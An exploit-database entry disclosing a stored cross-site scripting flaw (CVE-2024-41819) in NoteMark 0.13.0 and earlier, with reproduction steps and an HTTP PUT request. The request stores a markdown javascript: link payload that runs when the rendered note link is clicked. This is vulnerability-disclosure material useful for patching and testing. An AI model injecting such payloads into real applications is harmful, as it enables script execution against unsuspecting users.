NoteMark < 0.13.0 - Stored XSS
Author: Alessio Romano (sfoffo)
type: webapps
platform: multiple
port:
date_added: 2024-08-28
date_updated: 2024-08-28
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 52078.txt
type: webapps
platform: multiple
port:
date_added: 2024-08-28
date_updated: 2024-08-28
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 52078.txt
# Exploit Title: Stored XSS in NoteMark # Date: 07/29/2024 # Exploit Author: Alessio Romano (sfoffo) # Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/ # Version: 0.13.0 and below # Tested on: Linux # References: https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819, https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182, https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3 # CVE: CVE-2024-41819 ## Steps to Reproduce 1. Log in to the application. 2. Create a new note or enter a previously created note. 3. Access the note editor functionality from the selected note by clicking on the "Editor" tab. 4. Input the following payload: [xss-link](javascript:alert(1)) 5. Save the changes. 6. Click on the "Rendered" tab to view the rendered markdown version of the note. Click on the previously created link to pop the injected alert. ## HTTP Request PoC PUT /api/notes/<note-uuid>/content HTTP/1.1 Host: localhost:8000 Accept: */* Content-Type: text/plain;charset=UTF-8 Content-Length: 34 Sec-Fetch-Site: same-origin Authorization: Bearer <TOKEN> [xss-link](javascript:alert(1))
Copyright © 2024 Irfan TOOR all rights reserved.